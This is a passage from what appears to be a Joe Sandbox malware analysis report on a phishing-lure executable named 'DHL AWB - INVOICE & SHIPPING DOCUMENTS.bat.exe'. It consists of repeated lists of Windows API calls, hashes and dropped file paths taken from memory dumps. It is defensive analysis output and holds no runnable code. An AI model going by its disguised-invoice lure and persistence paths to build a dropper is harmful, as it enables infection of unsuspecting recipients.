                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\kapselaabnernes
                                            • API String ID: 1892508949-1304730697
                                            • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                            • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                            • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                            • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                            APIs
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                            • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxA376.tmp\System.dll), ref: 004061C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                            • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                            • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                            APIs
                                            • GlobalFree.KERNEL32(0084C998), ref: 00401C1B
                                            • GlobalAlloc.KERNEL32(?,00000404), ref: 00401C2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Call
                                            • API String ID: 3394109436-1824292864
                                            • Opcode ID: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                            • Instruction ID: 9dc913a82bccb3a17233260e0918e107c000b9093c8e114c97909187c283bf28
                                            • Opcode Fuzzy Hash: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                            • Instruction Fuzzy Hash: 292181B2600105EBDB50BFA58E84E5E72E8EB44318711453BF902F32D1DBBCE8169B9D
                                            APIs
                                              • Part of subcall function 00406620: FindFirstFileA.KERNELBASE(767D3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                              • Part of subcall function 00406620: FindClose.KERNEL32(00000000), ref: 00406637
                                            • lstrlenA.KERNEL32 ref: 00402358
                                            • lstrlenA.KERNEL32(00000000), ref: 00402362
                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                            • String ID:
                                            • API String ID: 1486964399-0
                                            • Opcode ID: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                            • Instruction ID: 014db6f64816cec2a1970dfcbbf9fa03b0cf1b46d42cec59bb2956c4bbb3b767
                                            • Opcode Fuzzy Hash: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                            • Instruction Fuzzy Hash: 35117071E04209ABDB10EFF58A45A9EB7F8AF00314F10407BA501F72C2D6FDC5428B59
                                            APIs
                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,00000011,00000002), ref: 00402612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Enum$CloseValue
                                            • String ID:
                                            • API String ID: 397863658-0
                                            • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                            • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                            • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                            • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                            APIs
                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,00000011,00000002), ref: 00402612
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                            • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                            • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                            • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                            • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                            • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                            • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                            APIs
                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            • Opcode ID: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                            • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                            • Opcode Fuzzy Hash: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                            • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                            • GetLastError.KERNEL32 ref: 004058E7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                            • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                            • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                            • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                            • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                            • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                            • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                            APIs
                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                            • CloseHandle.KERNEL32(?), ref: 0040595C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3712363035-0
                                            • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                            • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                            • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                            • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,?), ref: 004066C7
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                              • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                              • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                              • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 004066AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                            • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                            • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                            • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                            • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                            • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                            • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 004058F7
                                            • GetLastError.KERNEL32(?,?,0000000A,?), ref: 00405905
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                            • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
